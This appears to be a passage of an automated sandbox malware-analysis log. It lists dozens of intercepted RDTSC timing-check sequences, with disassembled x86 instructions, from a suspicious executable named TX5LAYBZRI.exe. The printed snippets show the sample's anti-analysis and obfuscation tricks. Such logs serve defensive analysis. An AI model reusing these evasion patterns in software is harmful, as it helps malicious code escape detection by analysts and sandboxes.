Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1485521 second address: 1485571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jo 00007FF108C7BF2Fh 0x00000010 jmp 00007FF108C7BF18h 0x00000015 jmp 00007FF108C7BF11h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF108C7BF15h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1486F73 second address: 1486F95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FF108873989h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 145AF05 second address: 145AF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897A4 second address: 14897B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF10887397Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897B8 second address: 14897EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF108C7BF15h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jl 00007FF108C7BF10h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897EA second address: 14897FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FF10887397Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897FC second address: 1489800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 148EBC4 second address: 148EC07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF108873987h 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007FF108873987h 0x00000012 pushad 0x00000013 jmp 00007FF10887397Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 148EC07 second address: 148EC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF108C7BF14h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491786 second address: 14917AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF10887397Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jp 00007FF108873976h 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149192F second address: 1491934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491934 second address: 149193A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149193A second address: 1491955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FF108C7BF1Ah 0x0000000b jmp 00007FF108C7BF0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491ABF second address: 1491AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF10887397Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491F09 second address: 1491F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491F0D second address: 1491F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1492079 second address: 149207F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494A76 second address: 1494A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF10887397Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494A86 second address: 1494A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF11h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494B40 second address: 1494B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873980h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495266 second address: 1495276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495276 second address: 1495283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495283 second address: 149528C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149528C second address: 1495290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14956E1 second address: 14956E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14956E6 second address: 14956EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BD2 second address: 1495BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF108C7BF14h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BF0 second address: 1495BF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BF6 second address: 1495BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BFC second address: 1495C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495C00 second address: 1495C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495D81 second address: 1495D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14962A4 second address: 14962A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14962A8 second address: 149630B instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D179Fh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FF108873978h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FF108873978h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FF10887397Ch 0x00000051 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1497DF6 second address: 1497E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jns 00007FF108C7BF06h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FF108C7BF08h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D243Ch] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FF108C7BF08h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c jmp 00007FF108C7BF0Fh 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jnp 00007FF108C7BF0Ch 0x0000005a jnl 00007FF108C7BF06h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1497E6B second address: 1497E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1497E71 second address: 1497E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1448993 second address: 14489B1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF108873982h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14489B1 second address: 14489B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149A91E second address: 149A928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F2A2 second address: 149F2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F2A6 second address: 149F2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F2AA second address: 149F2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F2B0 second address: 149F2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F2BA second address: 149F2EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2C6Ah], edi 0x00000012 push 00000000h 0x00000014 clc 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+122D242Eh], edx 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 ja 00007FF108C7BF06h 0x00000027 pop esi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F2EA second address: 149F2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F2EF second address: 149F300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007FF108C7BF0Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F300 second address: 149F31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF108873987h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A23FE second address: 14A2404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A39B5 second address: 14A39D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF10887397Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A39D8 second address: 14A3A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF108C7BF08h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1245C628h], ebx 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d jns 00007FF108C7BF06h 0x00000033 xor bx, 97DFh 0x00000038 popad 0x00000039 mov ebx, dword ptr [ebp+122D1E8Dh] 0x0000003f push 00000000h 0x00000041 mov di, 45DBh 0x00000045 xchg eax, esi 0x00000046 push edx 0x00000047 push eax 0x00000048 push eax 0x00000049 pop eax 0x0000004a pop eax 0x0000004b pop edx 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A3A40 second address: 14A3A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A5A5C second address: 14A5A66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A5A66 second address: 14A5AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FF108873978h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 movzx edi, si 0x00000025 mov edi, dword ptr [ebp+122D2CA6h] 0x0000002b mov dword ptr [ebp+122D17B2h], ebx 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D2AD3h] 0x00000039 push 00000000h 0x0000003b mov bx, C135h 0x0000003f xchg eax, esi 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A5AB5 second address: 14A5AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7C51 second address: 14A7C57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7C57 second address: 14A7C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7C5D second address: 14A7C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7C61 second address: 14A7C85 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF108C7BF13h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7C85 second address: 14A7C9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7C9C second address: 14A7CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7CA2 second address: 14A7CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14ACE54 second address: 14ACE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14ACE5A second address: 14ACEA9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FF108873978h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sbb di, F73Ah 0x0000002e sub dword ptr [ebp+122D3727h], edi 0x00000034 push 00000000h 0x00000036 add edi, 55F87DB5h 0x0000003c push 00000000h 0x0000003e mov bx, di 0x00000041 push eax 0x00000042 pushad 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14ADDA5 second address: 14ADDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14ADDAB second address: 14ADDB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14ADDB1 second address: 14ADE4D instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF108C7BF18h 0x00000012 nop 0x00000013 mov di, A6A5h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FF108C7BF08h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 jc 00007FF108C7BF0Ah 0x00000039 mov di, 835Fh 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007FF108C7BF08h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 sub ebx, dword ptr [ebp+122D1A35h] 0x0000005f xchg eax, esi 0x00000060 jmp 00007FF108C7BF0Eh 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FF108C7BF0Dh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14AFF7C second address: 14AFF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14AFF82 second address: 14AFF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF108C7BF06h 0x0000000a jng 00007FF108C7BF06h 0x00000010 popad 0x00000011 pushad 0x00000012 jnp 00007FF108C7BF06h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 144A4C3 second address: 144A4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FF108873986h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 144A4E2 second address: 144A4F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF108C7BF0Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 144A4F7 second address: 144A515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14B0640 second address: 14B064A instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108C7BF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149CFF2 second address: 149CFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F50B second address: 149F511 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149F511 second address: 149F517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14B8DB2 second address: 14B8DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF108C7BF18h 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007FF108C7BF06h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A0581 second address: 14A058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A2BA8 second address: 14A2BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A4AE6 second address: 14A4AF7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
